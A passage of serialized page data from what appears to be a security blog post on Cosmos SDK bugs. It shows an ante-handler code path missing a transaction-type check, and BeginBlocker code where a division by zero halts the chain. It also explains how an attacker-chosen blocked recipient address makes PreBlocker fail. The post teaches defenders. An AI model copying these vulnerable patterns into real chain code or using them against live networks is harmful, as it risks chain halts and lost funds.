)\n",{"type":26,"tag":137,"props":83098,"children":83099},{"class":5559,"line":11697},[83100],{"type":26,"tag":137,"props":83101,"children":83102},{"emptyLinePlaceholder":18},[83103],{"type":32,"value":6276},{"type":26,"tag":137,"props":83105,"children":83106},{"class":5559,"line":11803},[83107,83112],{"type":26,"tag":137,"props":83108,"children":83109},{"style":5610},[83110],{"type":32,"value":83111},"                default",{"type":26,"tag":137,"props":83113,"children":83114},{"style":5601},[83115],{"type":32,"value":8152},{"type":26,"tag":137,"props":83117,"children":83118},{"class":5559,"line":26089},[83119,83124,83128,83132,83137,83141,83146],{"type":26,"tag":137,"props":83120,"children":83121},{"style":5610},[83122],{"type":32,"value":83123},"                    return",{"type":26,"tag":137,"props":83125,"children":83126},{"style":5584},[83127],{"type":32,"value":28435},{"type":26,"tag":137,"props":83129,"children":83130},{"style":5601},[83131],{"type":32,"value":1108},{"type":26,"tag":137,"props":83133,"children":83134},{"style":5584},[83135],{"type":32,"value":83136},"stacktrace",{"type":26,"tag":137,"props":83138,"children":83139},{"style":5601},[83140],{"type":32,"value":470},{"type":26,"tag":137,"props":83142,"children":83143},{"style":5682},[83144],{"type":32,"value":83145},"Propagate",{"type":26,"tag":137,"props":83147,"children":83148},{"style":5601},[83149],{"type":32,"value":6054},{"type":26,"tag":137,"props":83151,"children":83152},{"class":5559,"line":26124},[83153,83158,83162,83166,83170,83175,83179,83184,83188,83192],{"type":26,"tag":137,"props":83154,"children":83155},{"style":5584},[83156],{"type":32,"value":83157},"                        sdkerrors",{"type":26,"tag":137,"props":83159,"children":83160},{"style":5601},[83161],{"type":32,"value":470},{"type":26,"tag":137,"props":83163,"children":83164},{"style":5682},[83165],{"type":32,"value":81448},{"type":26,"tag":137,"props":83167,"children":83168},{"style":5601},[83169],{"type":32,"value":165},{"type":26,"tag":137,"props":83171,"children":83172},{"style":5584},[83173],{"type":32,"value":83174},"sdkerrors",{"type":26,"tag":137,"props":83176,"children":83177},{"style":5601},[83178],{"type":32,"value":470},{"type":26,"tag":137,"props":83180,"children":83181},{"style":5584},[83182],{"type":32,"value":83183},"ErrUnknownExtensionOptions",{"type":26,"tag":137,"props":83185,"children":83186},{"style":5601},[83187],{"type":32,"value":1108},{"type":26,"tag":137,"props":83189,"children":83190},{"style":5584},[83191],{"type":32,"value":82973},{"type":26,"tag":137,"props":83193,"children":83194},{"style":5601},[83195],{"type":32,"value":9320},{"type":26,"tag":137,"props":83197,"children":83198},{"class":5559,"line":26132},[83199,83204],{"type":26,"tag":137,"props":83200,"children":83201},{"style":6837},[83202],{"type":32,"value":83203},"                        \"rejecting tx with unsupported extension option\"",{"type":26,"tag":137,"props":83205,"children":83206},{"style":5601},[83207],{"type":32,"value":6099},{"type":26,"tag":137,"props":83209,"children":83210},{"class":5559,"line":26140},[83211],{"type":26,"tag":137,"props":83212,"children":83213},{"style":5601},[83214],{"type":32,"value":83096},{"type":26,"tag":137,"props":83216,"children":83217},{"class":5559,"line":26149},[83218],{"type":26,"tag":137,"props":83219,"children":83220},{"style":5601},[83221],{"type":32,"value":73672},{"type":26,"tag":137,"props":83223,"children":83224},{"class":5559,"line":26191},[83225],{"type":26,"tag":137,"props":83226,"children":83227},{"emptyLinePlaceholder":18},[83228],{"type":32,"value":6276},{"type":26,"tag":137,"props":83230,"children":83231},{"class":5559,"line":26224},[83232,83236,83240,83244,83248,83252,83256,83260,83264],{"type":26,"tag":137,"props":83233,"children":83234},{"style":5610},[83235],{"type":32,"value":63330},{"type":26,"tag":137,"props":83237,"children":83238},{"style":5682},[83239],{"type":32,"value":82725},{"type":26,"tag":137,"props":83241,"children":83242},{"style":5601},[83243],{"type":32,"value":165},{"type":26,"tag":137,"props":83245,"children":83246},{"style":5584},[83247],{"type":32,"value":22874},{"type":26,"tag":137,"props":83249,"children":83250},{"style":5601},[83251],{"type":32,"value":1108},{"type":26,"tag":137,"props":83253,"children":83254},{"style":5584},[83255],{"type":32,"value":81783},{"type":26,"tag":137,"props":83257,"children":83258},{"style":5601},[83259],{"type":32,"value":1108},{"type":26,"tag":137,"props":83261,"children":83262},{"style":5584},[83263],{"type":32,"value":82663},{"type":26,"tag":137,"props":83265,"children":83266},{"style":5601},[83267],{"type":32,"value":5742},{"type":26,"tag":137,"props":83269,"children":83270},{"class":5559,"line":26232},[83271],{"type":26,"tag":137,"props":83272,"children":83273},{"style":5601},[83274],{"type":32,"value":61486},{"type":26,"tag":137,"props":83276,"children":83277},{"class":5559,"line":26240},[83278],{"type":26,"tag":137,"props":83279,"children":83280},{"style":5601},[83281],{"type":32,"value":5936},{"type":26,"tag":137,"props":83283,"children":83284},{"class":5559,"line":26249},[83285],{"type":26,"tag":137,"props":83286,"children":83287},{"emptyLinePlaceholder":18},[83288],{"type":32,"value":6276},{"type":26,"tag":137,"props":83290,"children":83291},{"class":5559,"line":26325},[83292],{"type":26,"tag":137,"props":83293,"children":83294},{"style":5564},[83295],{"type":32,"value":83296},"        // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n",{"type":26,"tag":137,"props":83298,"children":83299},{"class":5559,"line":26358},[83300],{"type":26,"tag":137,"props":83301,"children":83302},{"emptyLinePlaceholder":18},[83303],{"type":32,"value":6276},{"type":26,"tag":137,"props":83305,"children":83306},{"class":5559,"line":26366},[83307,83312,83316,83320,83324],{"type":26,"tag":137,"props":83308,"children":83309},{"style":5610},[83310],{"type":32,"value":83311},"        switch",{"type":26,"tag":137,"props":83313,"children":83314},{"style":5584},[83315],{"type":32,"value":70629},{"type":26,"tag":137,"props":83317,"children":83318},{"style":5601},[83319],{"type":32,"value":81382},{"type":26,"tag":137,"props":83321,"children":83322},{"style":5573},[83323],{"type":32,"value":35352},{"type":26,"tag":137,"props":83325,"children":83326},{"style":5601},[83327],{"type":32,"value":17395},{"type":26,"tag":137,"props":83329,"children":83330},{"class":5559,"line":26374},[83331,83336,83340,83344,83348],{"type":26,"tag":137,"props":83332,"children":83333},{"style":5610},[83334],{"type":32,"value":83335},"        case",{"type":26,"tag":137,"props":83337,"children":83338},{"style":6009},[83339],{"type":32,"value":81243},{"type":26,"tag":137,"props":83341,"children":83342},{"style":5601},[83343],{"type":32,"value":470},{"type":26,"tag":137,"props":83345,"children":83346},{"style":6009},[83347],{"type":32,"value":81276},{"type":26,"tag":137,"props":83349,"children":83350},{"style":5601},[83351],{"type":32,"value":8152},{"type":26,"tag":137,"props":83353,"children":83354},{"class":5559,"line":26411},[83355,83360,83364,83368,83372,83376],{"type":26,"tag":137,"props":83356,"children":83357},{"style":5584},[83358],{"type":32,"value":83359},"            anteHandler",{"type":26,"tag":137,"props":83361,"children":83362},{"style":5590},[83363],{"type":32,"value":5593},{"type":26,"tag":137,"props":83365,"children":83366},{"style":5584},[83367],{"type":32,"value":81243},{"type":26,"tag":137,"props":83369,"children":83370},{"style":5601},[83371],{"type":32,"value":470},{"type":26,"tag":137,"props":83373,"children":83374},{"style":5682},[83375],{"type":32,"value":83034},{"type":26,"tag":137,"props":83377,"children":83378},{"style":5601},[83379],{"type":32,"value":6054},{"type":26,"tag":137,"props":83381,"children":83382},{"class":5559,"line":26424},[83383,83388,83392,83397,83401],{"type":26,"tag":137,"props":83384,"children":83385},{"style":5584},[83386],{"type":32,"value":83387},"                authante",{"type":26,"tag":137,"props":83389,"children":83390},{"style":5601},[83391],{"type":32,"value":470},{"type":26,"tag":137,"props":83393,"children":83394},{"style":5682},[83395],{"type":32,"value":83396},"NewSetUpContextDecorator",{"type":26,"tag":137,"props":83398,"children":83399},{"style":5601},[83400],{"type":32,"value":20968},{"type":26,"tag":137,"props":83402,"children":83403},{"style":5564},[83404],{"type":32,"value":81897},{"type":26,"tag":137,"props":83406,"children":83407},{"class":5559,"line":26437},[83408],{"type":26,"tag":137,"props":83409,"children":83410},{"style":5590},[83411],{"type":32,"value":83412},"                 ...\n",{"type":26,"tag":137,"props":83414,"children":83415},{"class":5559,"line":26450},[83416,83420,83424,83429,83433,83437,83441],{"type":26,"tag":137,"props":83417,"children":83418},{"style":5584},[83419],{"type":32,"value":83387},{"type":26,"tag":137,"props":83421,"children":83422},{"style":5601},[83423],{"type":32,"value":470},{"type":26,"tag":137,"props":83425,"children":83426},{"style":5682},[83427],{"type":32,"value":83428},"NewIncrementSequenceDecorator",{"type":26,"tag":137,"props":83430,"children":83431},{"style":5601},[83432],{"type":32,"value":165},{"type":26,"tag":137,"props":83434,"children":83435},{"style":5584},[83436],{"type":32,"value":83079},{"type":26,"tag":137,"props":83438,"children":83439},{"style":5601},[83440],{"type":32,"value":17769},{"type":26,"tag":137,"props":83442,"children":83443},{"style":5564},[83444],{"type":32,"value":83445},"// innermost AnteDecorator\n",{"type":26,"tag":137,"props":83447,"children":83448},{"class":5559,"line":26504},[83449],{"type":26,"tag":137,"props":83450,"children":83451},{"style":5601},[83452],{"type":32,"value":80117},{"type":26,"tag":137,"props":83454,"children":83455},{"class":5559,"line":26513},[83456,83461],{"type":26,"tag":137,"props":83457,"children":83458},{"style":5610},[83459],{"type":32,"value":83460},"        default",{"type":26,"tag":137,"props":83462,"children":83463},{"style":5601},[83464],{"type":32,"value":8152},{"type":26,"tag":137,"props":83466,"children":83467},{"class":5559,"line":34876},[83468,83472,83476,83480,83484,83488,83492],{"type":26,"tag":137,"props":83469,"children":83470},{"style":5610},[83471],{"type":32,"value":81678},{"type":26,"tag":137,"props":83473,"children":83474},{"style":5584},[83475],{"type":32,"value":28435},{"type":26,"tag":137,"props":83477,"children":83478},{"style":5601},[83479],{"type":32,"value":1108},{"type":26,"tag":137,"props":83481,"children":83482},{"style":5584},[83483],{"type":32,"value":83136},{"type":26,"tag":137,"props":83485,"children":83486},{"style":5601},[83487],{"type":32,"value":470},{"type":26,"tag":137,"props":83489,"children":83490},{"style":5682},[83491],{"type":32,"value":83145},{"type":26,"tag":137,"props":83493,"children":83494},{"style":5601},[83495],{"type":32,"value":6054},{"type":26,"tag":137,"props":83497,"children":83498},{"class":5559,"line":34897},[83499,83504,83508,83513,83517,83521,83525,83530,83534,83539,83543,83547],{"type":26,"tag":137,"props":83500,"children":83501},{"style":5584},[83502],{"type":32,"value":83503},"                sdkerrors",{"type":26,"tag":137,"props":83505,"children":83506},{"style":5601},[83507],{"type":32,"value":470},{"type":26,"tag":137,"props":83509,"children":83510},{"style":5682},[83511],{"type":32,"value":83512},"Wrapf",{"type":26,"tag":137,"props":83514,"children":83515},{"style":5601},[83516],{"type":32,"value":165},{"type":26,"tag":137,"props":83518,"children":83519},{"style":5584},[83520],{"type":32,"value":83174},{"type":26,"tag":137,"props":83522,"children":83523},{"style":5601},[83524],{"type":32,"value":470},{"type":26,"tag":137,"props":83526,"children":83527},{"style":5584},[83528],{"type":32,"value":83529},"ErrUnknownRequest",{"type":26,"tag":137,"props":83531,"children":83532},{"style":5601},[83533],{"type":32,"value":1108},{"type":26,"tag":137,"props":83535,"children":83536},{"style":6837},[83537],{"type":32,"value":83538},"\"invalid transaction type: %T\"",{"type":26,"tag":137,"props":83540,"children":83541},{"style":5601},[83542],{"type":32,"value":1108},{"type":26,"tag":137,"props":83544,"children":83545},{"style":5584},[83546],{"type":32,"value":81783},{"type":26,"tag":137,"props":83548,"children":83549},{"style":5601},[83550],{"type":32,"value":9320},{"type":26,"tag":137,"props":83552,"children":83554},{"class":5559,"line":83553},53,[83555,83560],{"type":26,"tag":137,"props":83556,"children":83557},{"style":6837},[83558],{"type":32,"value":83559},"                \"transaction is not an SDK tx\"",{"type":26,"tag":137,"props":83561,"children":83562},{"style":5601},[83563],{"type":32,"value":6099},{"type":26,"tag":137,"props":83565,"children":83567},{"class":5559,"line":83566},54,[83568],{"type":26,"tag":137,"props":83569,"children":83570},{"style":5601},[83571],{"type":32,"value":80117},{"type":26,"tag":137,"props":83573,"children":83575},{"class":5559,"line":83574},55,[83576],{"type":26,"tag":137,"props":83577,"children":83578},{"style":5601},[83579],{"type":32,"value":5936},{"type":26,"tag":137,"props":83581,"children":83583},{"class":5559,"line":83582},56,[83584],{"type":26,"tag":137,"props":83585,"children":83586},{"emptyLinePlaceholder":18},[83587],{"type":32,"value":6276},{"type":26,"tag":137,"props":83589,"children":83591},{"class":5559,"line":83590},57,[83592,83596,83600,83604,83608,83612,83616,83620,83624],{"type":26,"tag":137,"props":83593,"children":83594},{"style":5610},[83595],{"type":32,"value":18336},{"type":26,"tag":137,"props":83597,"children":83598},{"style":5682},[83599],{"type":32,"value":82725},{"type":26,"tag":137,"props":83601,"children":83602},{"style":5601},[83603],{"type":32,"value":165},{"type":26,"tag":137,"props":83605,"children":83606},{"style":5584},[83607],{"type":32,"value":22874},{"type":26,"tag":137,"props":83609,"children":83610},{"style":5601},[83611],{"type":32,"value":1108},{"type":26,"tag":137,"props":83613,"children":83614},{"style":5584},[83615],{"type":32,"value":81783},{"type":26,"tag":137,"props":83617,"children":83618},{"style":5601},[83619],{"type":32,"value":1108},{"type":26,"tag":137,"props":83621,"children":83622},{"style":5584},[83623],{"type":32,"value":82663},{"type":26,"tag":137,"props":83625,"children":83626},{"style":5601},[83627],{"type":32,"value":5742},{"type":26,"tag":137,"props":83629,"children":83631},{"class":5559,"line":83630},58,[83632],{"type":26,"tag":137,"props":83633,"children":83634},{"style":5601},[83635],{"type":32,"value":5945},{"type":26,"tag":137,"props":83637,"children":83639},{"class":5559,"line":83638},59,[83640],{"type":26,"tag":137,"props":83641,"children":83642},{"style":5601},[83643],{"type":32,"value":6507},{"type":26,"tag":35,"props":83645,"children":83646},{},[83647,83649,83654,83656,83663,83664,83671],{"type":32,"value":83648},"Additional examples of incorrect ",{"type":26,"tag":130,"props":83650,"children":83652},{"className":83651},[],[83653],{"type":32,"value":81072},{"type":32,"value":83655}," usage include ",{"type":26,"tag":41,"props":83657,"children":83660},{"href":83658,"rel":83659},"https://jumpcrypto.com/writing/bypassing-ethermint-ante-handlers",[45],[83661],{"type":32,"value":83662},"yet more bypassable checks and loss of funds",{"type":32,"value":3339},{"type":26,"tag":41,"props":83665,"children":83668},{"href":83666,"rel":83667},"https://github.com/cosmos/ibc-go/issues/853",[45],[83669],{"type":32,"value":83670},"incorrect data passing between blockchains",{"type":32,"value":470},{"type":26,"tag":92,"props":83673,"children":83675},{"id":83674},"errors-panics-i-can-handle-it",[83676],{"type":32,"value":83677},"Errors? Panics? I can handle it",{"type":26,"tag":35,"props":83679,"children":83680},{},[83681],{"type":32,"value":83682},"Smart contract developers are used to not properly handling errors. This is acceptable since most underlying blockchains revert all state changes when execution fails.",{"type":26,"tag":35,"props":83684,"children":83685},{},[83686],{"type":32,"value":83687},"Cosmos is designed to provide a similar experience. Whenever some message handler returns an error, changes to the persistent state are dropped. Panics are handled similarly, where a recovery handler is wrapped around the message execution to convert panics into errors for a downstream process.",{"type":26,"tag":35,"props":83689,"children":83690},{},[83691,83693,83699,83701,83706],{"type":32,"value":83692},"This design is pretty neat and allows developers to write code in a rather lazy way. For instance, the following code works perfectly fine. If ",{"type":26,"tag":130,"props":83694,"children":83696},{"className":83695},[],[83697],{"type":32,"value":83698},"k.keeper.TotalReward()",{"type":32,"value":83700}," returns zero, the ",{"type":26,"tag":130,"props":83702,"children":83704},{"className":83703},[],[83705],{"type":32,"value":60547},{"type":32,"value":83707}," execution will simply rollback as if nothing has happened.",{"type":26,"tag":5512,"props":83709,"children":83711},{"code":83710,"language":78767,"meta":7,"className":78768,"style":7},"func (k msgServer) AllocateReward(\n    goCtx context.Context,\n    msg *types.MsgAllocateReward)\n(*types.MsgAllocatRewardResponse, error) {\n\n    RewardPerShare := k.keeper.Shares() /  k.keeper.TotalReward()\n    k.keeper.DistributeReward(RewardPerShare)\n\n    return &types.MsgAllocateRewardResponse, nil\n}\n",[83712],{"type":26,"tag":130,"props":83713,"children":83714},{"__ignoreMap":7},[83715,83748,83771,83799,83835,83842,83911,83949,83956,83988],{"type":26,"tag":137,"props":83716,"children":83717},{"class":5559,"line":5560},[83718,83722,83726,83731,83735,83739,83744],{"type":26,"tag":137,"props":83719,"children":83720},{"style":5573},[83721],{"type":32,"value":78903},{"type":26,"tag":137,"props":83723,"children":83724},{"style":5601},[83725],{"type":32,"value":4625},{"type":26,"tag":137,"props":83727,"children":83728},{"style":5584},[83729],{"type":32,"value":83730},"k ",{"type":26,"tag":137,"props":83732,"children":83733},{"style":6009},[83734],{"type":32,"value":78917},{"type":26,"tag":137,"props":83736,"children":83737},{"style":5601},[83738],{"type":32,"value":5671},{"type":26,"tag":137,"props":83740,"children":83741},{"style":5682},[83742],{"type":32,"value":83743},"AllocateReward",{"type":26,"tag":137,"props":83745,"children":83746},{"style":5601},[83747],{"type":32,"value":6054},{"type":26,"tag":137,"props":83749,"children":83750},{"class":5559,"line":5412},[83751,83755,83759,83763,83767],{"type":26,"tag":137,"props":83752,"children":83753},{"style":5584},[83754],{"type":32,"value":78938},{"type":26,"tag":137,"props":83756,"children":83757},{"style":6009},[83758],{"type":32,"value":78943},{"type":26,"tag":137,"props":83760,"children":83761},{"style":5601},[83762],{"type":32,"value":470},{"type":26,"tag":137,"props":83764,"children":83765},{"style":6009},[83766],{"type":32,"value":78952},{"type":26,"tag":137,"props":83768,"children":83769},{"style":5601},[83770],{"type":32,"value":6099},{"type":26,"tag":137,"props":83772,"children":83773},{"class":5559,"line":5417},[83774,83778,83782,83786,83790,83795],{"type":26,"tag":137,"props":83775,"children":83776},{"style":5584},[83777],{"type":32,"value":78964},{"type":26,"tag":137,"props":83779,"children":83780},{"style":5590},[83781],{"type":32,"value":12406},{"type":26,"tag":137,"props":83783,"children":83784},{"style":6009},[83785],{"type":32,"value":8343},{"type":26,"tag":137,"props":83787,"children":83788},{"style":5601},[83789],{"type":32,"value":470},{"type":26,"tag":137,"props":83791,"children":83792},{"style":6009},[83793],{"type":32,"value":83794},"MsgAllocateReward",{"type":26,"tag":137,"props":83796,"children":83797},{"style":5601},[83798],{"type":32,"value":5742},{"type":26,"tag":137,"props":83800,"children":83801},{"class":5559,"line":5642},[83802,83806,83810,83814,83818,83823,83827,83831],{"type":26,"tag":137,"props":83803,"children":83804},{"style":5601},[83805],{"type":32,"value":165},{"type":26,"tag":137,"props":83807,"children":83808},{"style":5590},[83809],{"type":32,"value":7152},{"type":26,"tag":137,"props":83811,"children":83812},{"style":6009},[83813],{"type":32,"value":8343},{"type":26,"tag":137,"props":83815,"children":83816},{"style":5601},[83817],{"type":32,"value":470},{"type":26,"tag":137,"props":83819,"children":83820},{"style":6009},[83821],{"type":32,"value":83822},"MsgAllocatRewardResponse",{"type":26,"tag":137,"props":83824,"children":83825},{"style":5601},[83826],{"type":32,"value":1108},{"type":26,"tag":137,"props":83828,"children":83829},{"style":6009},[83830],{"type":32,"value":17455},{"type":26,"tag":137,"props":83832,"children":83833},{"style":5601},[83834],{"type":32,"value":17395},{"type":26,"tag":137,"props":83836,"children":83837},{"class":5559,"line":5745},[83838],{"type":26,"tag":137,"props":83839,"children":83840},{"emptyLinePlaceholder":18},[83841],{"type":32,"value":6276},{"type":26,"tag":137,"props":83843,"children":83844},{"class":5559,"line":5850},[83845,83850,83854,83859,83863,83868,83872,83877,83881,83885,83890,83894,83898,83902,83907],{"type":26,"tag":137,"props":83846,"children":83847},{"style":5584},[83848],{"type":32,"value":83849},"    RewardPerShare",{"type":26,"tag":137,"props":83851,"children":83852},{"style":5590},[83853],{"type":32,"value":79019},{"type":26,"tag":137,"props":83855,"children":83856},{"style":5584},[83857],{"type":32,"value":83858}," k",{"type":26,"tag":137,"props":83860,"children":83861},{"style":5601},[83862],{"type":32,"value":470},{"type":26,"tag":137,"props":83864,"children":83865},{"style":5584},[83866],{"type":32,"value":83867},"keeper",{"type":26,"tag":137,"props":83869,"children":83870},{"style":5601},[83871],{"type":32,"value":470},{"type":26,"tag":137,"props":83873,"children":83874},{"style":5682},[83875],{"type":32,"value":83876},"Shares",{"type":26,"tag":137,"props":83878,"children":83879},{"style":5601},[83880],{"type":32,"value":16634},{"type":26,"tag":137,"props":83882,"children":83883},{"style":5590},[83884],{"type":32,"value":7162},{"type":26,"tag":137,"props":83886,"children":83887},{"style":5584},[83888],{"type":32,"value":83889},"  k",{"type":26,"tag":137,"props":83891,"children":83892},{"style":5601},[83893],{"type":32,"value":470},{"type":26,"tag":137,"props":83895,"children":83896},{"style":5584},[83897],{"type":32,"value":83867},{"type":26,"tag":137,"props":83899,"children":83900},{"style":5601},[83901],{"type":32,"value":470},{"type":26,"tag":137,"props":83903,"children":83904},{"style":5682},[83905],{"type":32,"value":83906},"TotalReward",{"type":26,"tag":137,"props":83908,"children":83909},{"style":5601},[83910],{"type":32,"value":10320},{"type":26,"tag":137,"props":83912,"children":83913},{"class":5559,"line":5878},[83914,83919,83923,83927,83931,83936,83940,83945],{"type":26,"tag":137,"props":83915,"children":83916},{"style":5584},[83917],{"type":32,"value":83918},"    k",{"type":26,"tag":137,"props":83920,"children":83921},{"style":5601},[83922],{"type":32,"value":470},{"type":26,"tag":137,"props":83924,"children":83925},{"style":5584},[83926],{"type":32,"value":83867},{"type":26,"tag":137,"props":83928,"children":83929},{"style":5601},[83930],{"type":32,"value":470},{"type":26,"tag":137,"props":83932,"children":83933},{"style":5682},[83934],{"type":32,"value":83935},"DistributeReward",{"type":26,"tag":137,"props":83937,"children":83938},{"style":5601},[83939],{"type":32,"value":165},{"type":26,"tag":137,"props":83941,"children":83942},{"style":5584},[83943],{"type":32,"value":83944},"RewardPerShare",{"type":26,"tag":137,"props":83946,"children":83947},{"style":5601},[83948],{"type":32,"value":5742},{"type":26,"tag":137,"props":83950,"children":83951},{"class":5559,"line":5891},[83952],{"type":26,"tag":137,"props":83953,"children":83954},{"emptyLinePlaceholder":18},[83955],{"type":32,"value":6276},{"type":26,"tag":137,"props":83957,"children":83958},{"class":5559,"line":5909},[83959,83963,83967,83971,83975,83980,83984],{"type":26,"tag":137,"props":83960,"children":83961},{"style":5610},[83962],{"type":32,"value":19582},{"type":26,"tag":137,"props":83964,"children":83965},{"style":5590},[83966],{"type":32,"value":9725},{"type":26,"tag":137,"props":83968,"children":83969},{"style":5584},[83970],{"type":32,"value":8343},{"type":26,"tag":137,"props":83972,"children":83973},{"style":5601},[83974],{"type":32,"value":470},{"type":26,"tag":137,"props":83976,"children":83977},{"style":5584},[83978],{"type":32,"value":83979},"MsgAllocateRewardResponse",{"type":26,"tag":137,"props":83981,"children":83982},{"style":5601},[83983],{"type":32,"value":1108},{"type":26,"tag":137,"props":83985,"children":83986},{"style":5573},[83987],{"type":32,"value":79245},{"type":26,"tag":137,"props":83989,"children":83990},{"class":5559,"line":5930},[83991],{"type":26,"tag":137,"props":83992,"children":83993},{"style":5601},[83994],{"type":32,"value":6507},{"type":26,"tag":35,"props":83996,"children":83997},{},[83998,84000,84006,84007,84013,84014,84020,84022,84027],{"type":32,"value":83999},"However, the same assumption does not always hold. Certain parts of Cosmos, such as ",{"type":26,"tag":130,"props":84001,"children":84003},{"className":84002},[],[84004],{"type":32,"value":84005},"PreBlocker",{"type":32,"value":1108},{"type":26,"tag":130,"props":84008,"children":84010},{"className":84009},[],[84011],{"type":32,"value":84012},"BeginBlocker",{"type":32,"value":3525},{"type":26,"tag":130,"props":84015,"children":84017},{"className":84016},[],[84018],{"type":32,"value":84019},"EndBlocker",{"type":32,"value":84021},", are not protected by the error handling mechanism. So, if we move the reward distribution logic into ",{"type":26,"tag":130,"props":84023,"children":84025},{"className":84024},[],[84026],{"type":32,"value":84012},{"type":32,"value":84028}," to automatically distribute rewards at the start of each block, panics raised by division by 0 will halt the chain.",{"type":26,"tag":5512,"props":84030,"children":84032},{"code":84031,"language":78767,"meta":7,"className":78768,"style":7},"func BeginBlocker(ctx context.Context, keeper keeper.Keeper) error {\n\n    RewardPerShare := keeper.Shares() /  keeper.TotalReward()\n    keeper.DistributeReward(RewardPerShare)\n\n return nil\n}\n",[84033],{"type":26,"tag":130,"props":84034,"children":84035},{"__ignoreMap":7},[84036,84101,84108,84156,84184,84191,84203],{"type":26,"tag":137,"props":84037,"children":84038},{"class":5559,"line":5560},[84039,84043,84048,84052,84056,84060,84064,84068,84072,84076,84081,84085,84089,84093,84097],{"type":26,"tag":137,"props":84040,"children":84041},{"style":5573},[84042],{"type":32,"value":78903},{"type":26,"tag":137,"props":84044,"children":84045},{"style":5682},[84046],{"type":32,"value":84047}," BeginBlocker",{"type":26,"tag":137,"props":84049,"children":84050},{"style":5601},[84051],{"type":32,"value":165},{"type":26,"tag":137,"props":84053,"children":84054},{"style":5584},[84055],{"type":32,"value":22874},{"type":26,"tag":137,"props":84057,"children":84058},{"style":6009},[84059],{"type":32,"value":78943},{"type":26,"tag":137,"props":84061,"children":84062},{"style":5601},[84063],{"type":32,"value":470},{"type":26,"tag":137,"props":84065,"children":84066},{"style":6009},[84067],{"type":32,"value":78952},{"type":26,"tag":137,"props":84069,"children":84070},{"style":5601},[84071],{"type":32,"value":1108},{"type":26,"tag":137,"props":84073,"children":84074},{"style":5584},[84075],{"type":32,"value":83867},{"type":26,"tag":137,"props":84077,"children":84078},{"style":6009},[84079],{"type":32,"value":84080}," keeper",{"type":26,"tag":137,"props":84082,"children":84083},{"style":5601},[84084],{"type":32,"value":470},{"type":26,"tag":137,"props":84086,"children":84087},{"style":6009},[84088],{"type":32,"value":82547},{"type":26,"tag":137,"props":84090,"children":84091},{"style":5601},[84092],{"type":32,"value":5671},{"type":26,"tag":137,"props":84094,"children":84095},{"style":6009},[84096],{"type":32,"value":17455},{"type":26,"tag":137,"props":84098,"children":84099},{"style":5601},[84100],{"type":32,"value":5875},{"type":26,"tag":137,"props":84102,"children":84103},{"class":5559,"line":5412},[84104],{"type":26,"tag":137,"props":84105,"children":84106},{"emptyLinePlaceholder":18},[84107],{"type":32,"value":6276},{"type":26,"tag":137,"props":84109,"children":84110},{"class":5559,"line":5417},[84111,84115,84119,84123,84127,84131,84135,84139,84144,84148,84152],{"type":26,"tag":137,"props":84112,"children":84113},{"style":5584},[84114],{"type":32,"value":83849},{"type":26,"tag":137,"props":84116,"children":84117},{"style":5590},[84118],{"type":32,"value":79019},{"type":26,"tag":137,"props":84120,"children":84121},{"style":5584},[84122],{"type":32,"value":84080},{"type":26,"tag":137,"props":84124,"children":84125},{"style":5601},[84126],{"type":32,"value":470},{"type":26,"tag":137,"props":84128,"children":84129},{"style":5682},[84130],{"type":32,"value":83876},{"type":26,"tag":137,"props":84132,"children":84133},{"style":5601},[84134],{"type":32,"value":16634},{"type":26,"tag":137,"props":84136,"children":84137},{"style":5590},[84138],{"type":32,"value":7162},{"type":26,"tag":137,"props":84140,"children":84141},{"style":5584},[84142],{"type":32,"value":84143},"  keeper",{"type":26,"tag":137,"props":84145,"children":84146},{"style":5601},[84147],{"type":32,"value":470},{"type":26,"tag":137,"props":84149,"children":84150},{"style":5682},[84151],{"type":32,"value":83906},{"type":26,"tag":137,"props":84153,"children":84154},{"style":5601},[84155],{"type":32,"value":10320},{"type":26,"tag":137,"props":84157,"children":84158},{"class":5559,"line":5642},[84159,84164,84168,84172,84176,84180],{"type":26,"tag":137,"props":84160,"children":84161},{"style":5584},[84162],{"type":32,"value":84163},"    keeper",{"type":26,"tag":137,"props":84165,"children":84166},{"style":5601},[84167],{"type":32,"value":470},{"type":26,"tag":137,"props":84169,"children":84170},{"style":5682},[84171],{"type":32,"value":83935},{"type":26,"tag":137,"props":84173,"children":84174},{"style":5601},[84175],{"type":32,"value":165},{"type":26,"tag":137,"props":84177,"children":84178},{"style":5584},[84179],{"type":32,"value":83944},{"type":26,"tag":137,"props":84181,"children":84182},{"style":5601},[84183],{"type":32,"value":5742},{"type":26,"tag":137,"props":84185,"children":84186},{"class":5559,"line":5745},[84187],{"type":26,"tag":137,"props":84188,"children":84189},{"emptyLinePlaceholder":18},[84190],{"type":32,"value":6276},{"type":26,"tag":137,"props":84192,"children":84193},{"class":5559,"line":5850},[84194,84198],{"type":26,"tag":137,"props":84195,"children":84196},{"style":5610},[84197],{"type":32,"value":55469},{"type":26,"tag":137,"props":84199,"children":84200},{"style":5573},[84201],{"type":32,"value":84202}," nil\n",{"type":26,"tag":137,"props":84204,"children":84205},{"class":5559,"line":5878},[84206],{"type":26,"tag":137,"props":84207,"children":84208},{"style":5601},[84209],{"type":32,"value":6507},{"type":26,"tag":118,"props":84211,"children":84213},{"id":84212},"real-world-examples-3",[84214],{"type":32,"value":79292},{"type":26,"tag":35,"props":84216,"children":84217},{},[84218],{"type":32,"value":84219},"Recently, developers have become increasingly aware of unprotected ABCI functions, but this doesn't stop DoS bugs from manifesting. So what is the catch?",{"type":26,"tag":35,"props":84221,"children":84222},{},[84223,84225,84231,84233,84238,84240,84246,84248,84254,84256,84262],{"type":32,"value":84224},"The problem lies in the lack of proper understanding of utility functions. The example here implements a bridge that mints wrapped BTC tokens in the PreBlocker when bridging events are observed. Notably, errors returned by ",{"type":26,"tag":130,"props":84226,"children":84228},{"className":84227},[],[84229],{"type":32,"value":84230},"bankKeeper.SendCoinsFromModuleToAccount",{"type":32,"value":84232}," will be bubbled up through ",{"type":26,"tag":130,"props":84234,"children":84236},{"className":84235},[],[84237],{"type":32,"value":84005},{"type":32,"value":84239}," and halt the chain. It turns out an attacker can force ",{"type":26,"tag":130,"props":84241,"children":84243},{"className":84242},[],[84244],{"type":32,"value":84245},"SendCoinsFromModuleToAccount",{"type":32,"value":84247}," to return an error by setting ",{"type":26,"tag":130,"props":84249,"children":84251},{"className":84250},[],[84252],{"type":32,"value":84253},"recipient",{"type":32,"value":84255}," to some ",{"type":26,"tag":130,"props":84257,"children":84259},{"className":84258},[],[84260],{"type":32,"value":84261},"BlockedAddr",{"type":32,"value":84263},",rendering the code susceptible to DoS 